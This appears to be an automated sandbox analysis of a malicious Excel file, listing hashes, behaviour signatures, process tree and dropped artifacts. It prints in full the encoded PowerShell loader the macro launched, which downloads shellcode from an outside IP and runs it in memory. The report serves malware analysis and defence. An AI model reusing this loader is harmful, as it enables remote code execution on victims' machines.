Analysis

  • max time kernel
    13s
  • max time network
    18s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
  • submitted
    13-11-2024 21:48

General

  • Target

    4498e711c0238bfc2444a66003d745c6482f673b1ad4f6b643701e437d902e5f.xls

  • Size

    46KB

  • MD5

    a577d04005ded2c2a765cf59ab347508

  • SHA1

    9467b968e5ea5bf2d8b05f10ef11a2eab28cd29c

  • SHA256

    4498e711c0238bfc2444a66003d745c6482f673b1ad4f6b643701e437d902e5f

  • SHA512

    357aa26a6712dc5cc40c0854704098b3c373572c5efc01b73ebd047581c29133d26f6f0204373a83028384bd9e9411ad5420bcb99005b839ed7f9493292dadad

  • SSDEEP

    768:s4SFsv66g3KnF439NKC54kkGfn+cL2XdA8YRtukODXwXqt7sNAQYzKEm8ZRu9Uzp:XSFsv66g3KnF439NKC54kkGfn+cL2Xd+

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://194.182.164.149:8080/fontawesome.woff

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\4498e711c0238bfc2444a66003d745c6482f673b1ad4f6b643701e437d902e5f.xls
    1⤵
    • System Location Discovery: System Language Discovery
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2880
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -nop -w hidden -Enc JABXAGkAbgAzADIAIAA9ACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFcAaQBuADMAMgAgAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACwAIABDAGgAYQByAFMAZQB0AD0AQwBoAGEAcgBTAGUAdAAuAEEAbgBzAGkAKQBdAA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAANAAoAIAAgACAAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsAA0ACgAgACAAIAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwADQAKACAAIAAgACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgAsACAAUwBlAHQATABhAHMAdABFAHIAcgBvAHIAPQB0AHIAdQBlACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAVQBJAG4AdAAzADIAIABXAGEAaQB0AEYAbwByAFMAaQBuAGcAbABlAE8AYgBqAGUAYwB0ACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABoAEgAYQBuAGQAbABlACwADQAKACAAIAAgACAAVQBJAG4AdAAzADIAIABkAHcATQBpAGwAbABpAHMAZQBjAG8AbgBkAHMAKQA7AA0ACgB9AA0ACgAiAEAADQAKAEEAZABkAC0AVAB5AHAAZQAgACQAVwBpAG4AMwAyAA0ACgANAAoAIwAgAEkAUwBDAHsAaABlAGMAYQByAG0AZQBuAF8AdwBhAHMAXwBoAGUAcgBlAH0ADQAKAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0AIAA7AA0ACgAkAHMAaABlAGwAbABjAG8AZABlACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAEwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAiAGgAdAB0AHAAcwA6AC8ALwAxADkANAAuADEAOAAyAC4AMQA2ADQALgAxADQAOQA6ADgAMAA4ADAALwBmAG8AbgB0AGEAdwBlAHMAbwBtAGUALgB3AG8AZgBmACIAKQANAAoAaQBmACAAKAAkAHMAaABlAGwAbABjAG8AZABlACAALQBlAHEAIAAkAG4AdQBsAGwAKQAgAHsARQB4AGkAdAB9ADsADQAKACQAcwBpAHoAZQAgAD0AIAAkAHMAaABlAGwAbABjAG8AZABlAC4ATABlAG4AZwB0AGgADQAKAA0ACgBbAEkAbgB0AFAAdAByAF0AJABhAGQAZAByACAAPQAgAFsAVwBpAG4AMwAyAF0AOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsACQAcwBpAHoAZQAsADAAeAAxADAAMAAwACwAMAB4ADQAMAApADsADQAKAFsAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMALgBNAGEAcgBzAGgAYQBsAF0AOgA6AEMAbwBwAHkAKAAkAHMAaABlAGwAbABjAG8AZABlACwAIAAwACwAIAAkAGEAZABkAHIALAAgACQAcwBpAHoAZQApAA0ACgAkAHQAaABhAG4AZABsAGUAPQBbAFcAaQBuADMAMgBdADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABhAGQAZAByACwAMAAsADAALAAwACkAOwANAAoAWwBXAGkAbgAzADIAXQA6ADoAVwBhAGkAdABGAG8AcgBTAGkAbgBnAGwAZQBPAGIAagBlAGMAdAAoACQAdABoAGEAbgBkAGwAZQAsACAAWwB1AGkAbgB0ADMAMgBdACIAMAB4AEYARgBGAEYARgBGAEYARgAiACkA
      2⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2700
      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\tv7gbzig.cmdline"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1276
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
          C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6D16.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC6D15.tmp"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2408

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\RES6D16.tmp

    Filesize

    1KB

    MD5

    86454fd99bdaa9255ad7a4559cd8d21b

    SHA1

    46b547e0a1f8ba27e1fd9d49aa4a97e596b26e4a

    SHA256

    b6c62692d635bf683a6429726e157daca87023f06f3be0219deb81243649a55d

    SHA512

    2a766eda9cf724a9a1ff62a0e0259a4854ce8c98a5bec6ad1705ba6f939f95a94599cb5ff2d9f672ce9903619b050a56c393937fac1177185fcef0afa4b327e7

  • C:\Users\Admin\AppData\Local\Temp\tv7gbzig.dll

    Filesize

    3KB

    MD5

    42b655f7508cde94798963a8aa8cb232

    SHA1

    b5a5f12fe20b066b58a6128b6ce425244cf986b9

    SHA256

    c9a9cb0f8be26e133e53fb61ca64d89adf09c41c3ebad645f302e29a8010d691

    SHA512

    cff543f7b4f6c23d91eff1e79caa039d06ec2595d481ce0f76e54a78e114e92bfb65133eff21c09befc5391b212a3469f839be62edc637407b83796ba1051555

  • C:\Users\Admin\AppData\Local\Temp\tv7gbzig.pdb

    Filesize

    7KB

    MD5

    020a6a2789ad17ed649087565397b229

    SHA1

    487227dabd2ae81077a4de19e30be9960c5837a1

    SHA256

    073f76a6281e5a34f1879b246c96522e6babefc2114fef20d8ed358dfedaf70e

    SHA512

    dec9e2d57daf50edd9943e243564664acc0a12f8d1b9c6b74f843eb248e16c9a0816dd71f3d10304735b2ea48fa8d92ae20c30685c21548c1281f88442961128

  • \??\c:\Users\Admin\AppData\Local\Temp\CSC6D15.tmp

    Filesize

    652B

    MD5

    5026443a29e9e7006de9dcb8c70524e1

    SHA1

    7a63a998109591d51aba0b3c943141ab53a73e25

    SHA256

    851d5a4c0e8af1da616c615c1fc667ac4bb6856ea7c2dee16ef8eff47533fb6c

    SHA512

    fa66ae06b2d53841ab451d9c5f13e19af609215204e936d4cee7721b5a8c613933f6351e30385da051fbdae7465d29022fc42709337aed5c891e9db21cfbcf26

  • \??\c:\Users\Admin\AppData\Local\Temp\tv7gbzig.0.cs

    Filesize

    631B

    MD5

    f4dd5c682eb7b3b679f084261bfc7c4c

    SHA1

    70f75d7a4e42c185eb09139ed3c6f7338a2219c2

    SHA256

    2908bfece2edd241dc4f7cc26608c3254f7e5b896a38114618d56b65d4fc4319

    SHA512

    8f91148a6bd15f8182ef00b3e75b008eacda414852e8169112013377e4b9b88e1a0be73c8e0c212b8c0a51c24fbb2849c44d742f6019c9c5bf0dfb0e28a1b83d

  • \??\c:\Users\Admin\AppData\Local\Temp\tv7gbzig.cmdline

    Filesize

    309B

    MD5

    63d8a39999eb2ec6d4bcf407f2aeaa01

    SHA1

    67f0e3558ca78292bf1dfa226e78dbadd9f30ad6

    SHA256

    2cf45083deeaac7fe14f2ad2d4dd9d83d221952c8f5b6a767e4dae39eb16d959

    SHA512

    880e0a7f239bd1736dc84afbc77cad2a3414557ad01b0f2a1d2fd05a772b3ca749ea81833676a9b960a0d20f076f1a7cfc5cd457ad161faea855ae5d0eed7182

  • memory/2880-8-0x00000000001B0000-0x00000000002B0000-memory.dmp

    Filesize

    1024KB

  • memory/2880-6-0x00000000001B0000-0x00000000002B0000-memory.dmp

    Filesize

    1024KB

  • memory/2880-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

  • memory/2880-9-0x00000000001B0000-0x00000000002B0000-memory.dmp

    Filesize

    1024KB

  • memory/2880-2-0x00000000001B0000-0x00000000002B0000-memory.dmp

    Filesize

    1024KB

  • memory/2880-3-0x00000000001B0000-0x00000000002B0000-memory.dmp

    Filesize

    1024KB

  • memory/2880-1-0x0000000071E9D000-0x0000000071EA8000-memory.dmp

    Filesize

    44KB

  • memory/2880-27-0x0000000071E9D000-0x0000000071EA8000-memory.dmp

    Filesize

    44KB

  • memory/2880-28-0x00000000001B0000-0x00000000002B0000-memory.dmp

    Filesize

    1024KB

  • memory/2880-29-0x00000000001B0000-0x00000000002B0000-memory.dmp

    Filesize

    1024KB